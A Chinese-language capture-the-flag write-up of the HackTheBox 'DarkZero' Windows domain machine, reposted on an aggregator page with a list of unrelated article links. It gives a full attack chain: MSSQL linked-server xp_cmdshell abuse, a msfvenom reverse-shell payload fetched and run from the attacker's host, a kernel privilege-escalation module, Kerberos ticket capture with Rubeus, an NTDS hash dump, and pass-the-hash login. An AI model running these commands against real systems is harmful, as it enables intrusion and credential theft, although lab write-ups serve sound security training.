当前位置: 首页 > news >正文

DarkZero

news 2025/10/24 10:53:43

Information Gathering

做信息收集的时候,发现是一台Windows域靶机,开放了很多内网相关的端口。我们也发现了一个域名darkzero.htb,我们可以添加到hosts文件中

sudo rustscan -a 10.10.11.89 -r 1-65535 -- -A -sV -oN result.txt -Pn -max-retries=0

在这里插入图片描述
从commonName值中可以看到darkzero-DC01-CA,猜测该Windows机器使用了ADCS技术

Foothold

靶机一开始给了一个凭据给我们,可以使用这个凭据登录MSSQL服务
在这里插入图片描述

impacket-mssqlclient darkzero.htb/'john.w':'RFulUtONCOL!'@10.10.11.89 -windows-auth

在这里插入图片描述
枚举linkserver,发现另一个数据库链接DC02.darkzero.ext。可以使用这个数据库进行反弹shell

enum_links
use_link "DC02.darkzero.ext"
exec('xp_cmdshell "whoami"')

在这里插入图片描述
在这里插入图片描述
msfvenom生成一个payload,利用xp_cmdshell进行反弹shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=tun0 lport=9000 -f exe -o shell.exe
exec('xp_cmdshell "powershell iwr http://10.10.16.31/shell.exe -outfile C:\Users\Public\shell.exe"')
exec('xp_cmdshell "C:\Users\Public\shell.exe"')

在这里插入图片描述
在这里插入图片描述

Privilege Escalation

运行msf的exploit_suggester模块,发现了一个内核漏洞编号cve_2024_30088,使用这个模块可以进行本地提权

run post/multi/recon/local_exploit_suggester

在这里插入图片描述
在这里插入图片描述
读取user.txt内容
在这里插入图片描述

LatervalMovement

获取SYSTEM权限后,上传Rubeus.exe进行监听

Rubeus.exe monitor /interval:1 /nowrap
EXEC xp_dirtree '\\DC02.darkzero.ext\\share'

在这里插入图片描述
在这里插入图片描述
获取以上票据后,将其写入到dc01_tgt.kirbi文件中并完成转化,同步DC的时间

vim dc01_tgt.kirbi
cat dc01_tgt.kirbi|base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi admin.ccache
export KRB5CCNAME=admin.ccache
sudo ntpdate -u 10.10.11.89

在这里插入图片描述
最后使用secretdump下载NTDS.DIT文件

impacket-secretsdump -k -no-pass darkzero.htb/DC01\$@DC01.darkzero.htb

在这里插入图片描述

evil-winrm -i 10.10.11.89 -u administrator -H 5917507bdf2ef2c2b0a869a1cba40726

在这里插入图片描述

http://www.dtcms.com/a/520752.html

相关文章:

  • python 网站开发怎么部署龙岩有什么招聘本地网站
  • 上海兼职做网站淘宝友情链接怎么设置
  • 【Linux系统编程】程序替换:execve(execl、execlp、execle、execv、execvp、execvpe)
  • 西安市城乡房地产建设管理局网站wordpress国外主题修改
  • 巨鹿网站建设网络公司云南住房和建设厅网站
  • 前端八股文 | HTTP - 实时通信方式/前后端通信方式
  • 谈一谈ViewDragHelper的工作原理?
  • Flutter框架机制详解
  • 火山引擎推出Data Agent评测体系,并发布《2025数据智能体实践指南》
  • SpringBoot-Web开发之异常处理
  • wap网站和app的区别php网站后台建设
  • 舞阳网站建设如何引流被动加好友
  • js wordpress 菜单管理如何给网站做seo优化
  • Nginx server_name 配置详解
  • 做宣传网站网页制作素材去哪找
  • 百度地图网站开发wordpress会员权限
  • 微硕WSF2040 N沟MOSFET:汽车电动尾门“防夹升降核”
  • 网站建设投标书报价表建设电子商务网站的好处
  • 网站建设与开发教学大纲全网商机app招标
  • Less-4 GET-Error based-Double Quotes-String
  • 互斥锁、读写锁、ref()函数使用
  • 2.6、Web漏洞挖掘实战(下):XSS、文件上传与逻辑漏洞深度解析
  • 邢台做网站的公司有那个营销型网站建设营销型
  • 青岛住房和城乡建设厅网站首页iis7.0 asp网站配置
  • vue3表格显示隐藏列全屏拖动功能
  • Git Commit Message 规范:写出清晰、可维护的提交记录
  • Orleans + Kubernetes + Istio 服务网格集成深度解析
  • 51网站怎么打开注册城乡规划师有什么用
  • 相向指针|盛最多水的容器|接雨水|验证回文串
  • Web3j 中使用 Transaction 类进行以太坊交互的核心方法